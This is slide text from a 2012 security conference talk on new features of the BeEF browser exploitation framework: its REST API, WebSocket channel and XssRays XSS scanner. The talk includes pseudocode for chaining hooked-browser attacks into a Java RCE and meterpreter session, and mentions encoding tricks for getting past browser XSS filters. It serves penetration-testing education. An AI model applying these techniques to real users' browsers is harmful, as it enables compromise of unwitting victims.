[2024]Digital Global Overview Report 2024 Meltwater.pdf
Advances in BeEF - AthCon2012
1. Advances in BeEF
RESTful API, WebSockets, XssRays
Michele “antisnatchor” Orru’
2012 - Athens - 4 May 2012
Saturday, May 5, 12
2. Who am I?
- Senior Security Consultant @ TW SpiderLabs
- BeEF lead core developer
- Application Security researcher
- OpenBSD, Ruby and Javascript addict
- @antisnatchor
- http://antisnatchor.com
Saturday, May 5, 12
3. What is BeEF?
Browser Exploitation Framework
Powerful platform for Client-side pwnage, XSS
post-exploitation and generally victim browser
security-context abuse.
The framework allows the penetration tester to
select specific modules (in real-time) to target
each browser, and therefore each context.
Saturday, May 5, 12
6. Outline
1. The need to be RESTful: the new API
II. The need to be speedy: WebSockets support
III. I want more XSSs: XssRays enhancements
IV. demos and fun :D
Saturday, May 5, 12
7. The need to be RESTful
- I hate SOAP
- I hate XML-RPC
- I love to use protocol
(HTTP) features without
reinventing the wheel
Saturday, May 5, 12
8. The need to be RESTful
Ruby + Sinatra + JSON = WIN
get ‘/to/a/pub’
“BeER please”
end
Saturday, May 5, 12
9. The need to be RESTful
- programmatically control BeEF with whatever
eats HTTP and JSON (bash + curl?)
- facilitate integration with third tools (ZAP?)
- create your own custom UI/GUI (mobile?)
Saturday, May 5, 12
10. The need to be RESTful
More info:
- http://blog.beefproject.com/2012/03/restful-api-from-
antisnatchor-with-love.html
- http://blog.beefproject.com/2012/03/restful-api-demo.html
Read the doc, you lazy!
- https://github.com/beefproject/beef/wiki/BeEF-RESTful-API
Saturday, May 5, 12
11. The need to be RESTful
Demo time
Pwn hooked browsers with JDK <= 1.6.0_27
1. get hooked browsers type/version/OS/plugins
II. if browserIsIE
createOverlayIframe(Above)
else
launchManInTheBrowser
end
III. if javaEnabled launchGetSystemInfo
IV. if JDK <= 1.6.0_27 launchRhinoRCE
V. enjoy Java meterpreter
Saturday, May 5, 12
12. The need to be speedy: WS
BeEF communication channel uses XHR-polling
Pros:
- works everywhere (we support IE, Chrome,
Safari, Firefox, Opera and mobile browsers)
Cons:
- not efficient, data overhead
Saturday, May 5, 12
13. The need to be speedy: WS
Meet WebSocket support in BeEF
XHR-polling
Saturday, May 5, 12
14. The need to be speedy: WS
Meet WebSocket support in BeEF
XHR-polling WebSockets
Saturday, May 5, 12
15. The need to be speedy: WS
If beef.browser.hasWebSocket()
don’t use XHR-polling, open a WebSocket channel
currently supported: Firefox, Chrome, Safari
also MozWebSocket (damn prefixes #$*(%$)
speaks hixie-75, hixie-76, hybi-07, hybi-10
Saturday, May 5, 12
16. The need to be speedy: WS
still experimental in BeEF (bugfixing/testing phase)
clone https://github.com/radoen/beef-radoen to give it a try
opens a whole new range of possible features
- real time VNC-like hooked browser control
- faster Tunneling proxy (fuzzing through the hooked
browser 4/5 times faster)
- general faster communication
Saturday, May 5, 12
17. The need to be speedy: WS
demo time
- launch 1000 return_long_string modules,
both normal XHR-polling and WebSockets
Saturday, May 5, 12
18. I want more XSSs:
XssRays
Originally developed by Gareth Heyes in 2009 as a pure JS-
based XSS scanner. Then integrated in BeEF.
XssRays basically parse all the links and forms of the page
where it is loaded and check for XSS on GET, POST
parameters, and also in the URI path creating hidden
iFrames.
Who uses FrameBusting/X-Frame-Options out there :-)?
Saturday, May 5, 12
19. I want more XSSs:
XssRays
We inject a vector that will contact back BeEF if the JS
code will be successfully executed (thus, the XSS
confirmed). Also means false-positive free.
Potential false-negatives as we blindly inject vectors.
Basically the document.location.href of the injected iFrame
that contains the vector will point to a known BeEF
resource.
Saturday, May 5, 12
21. I want more XSSs:
XssRays
It also works cross-domain
(respecting the SOP)
Saturday, May 5, 12
22. I want more XSSs:
XssRays
Enhancements from previous months:
- added more attack vectors
double URL encoded, double nibble, DOM based injections
- added Chrome/Safari support
base64‘ing the iFrame src in order to bypass the XSS filter
- added IE6 to IE9 support
did you know that in IE6 location.pathname doesn’t contains the
first forward slash? (thanks Gareth)
Saturday, May 5, 12
23. Thanks
Thanks to my BeEFfy friends: Wade, Christian, Brendan,
Javier, Saafan, Graziano, Ben W., Ben P., Pipes and anyone I may
have forgotten
Our new blogger Heather P.
SpiderLabs because I don’t have to take holidays to be here
Special thanks to Kyprianos and Chris
Saturday, May 5, 12
24. Thanks
follow us: @beefproject
main site: http://beefproject.com
the new blog: http://blog.beefproject.com
github page: https://github.com/beefproject/beef
(Please note: we’ll not pay you. You know we love OpenSource :-)
Saturday, May 5, 12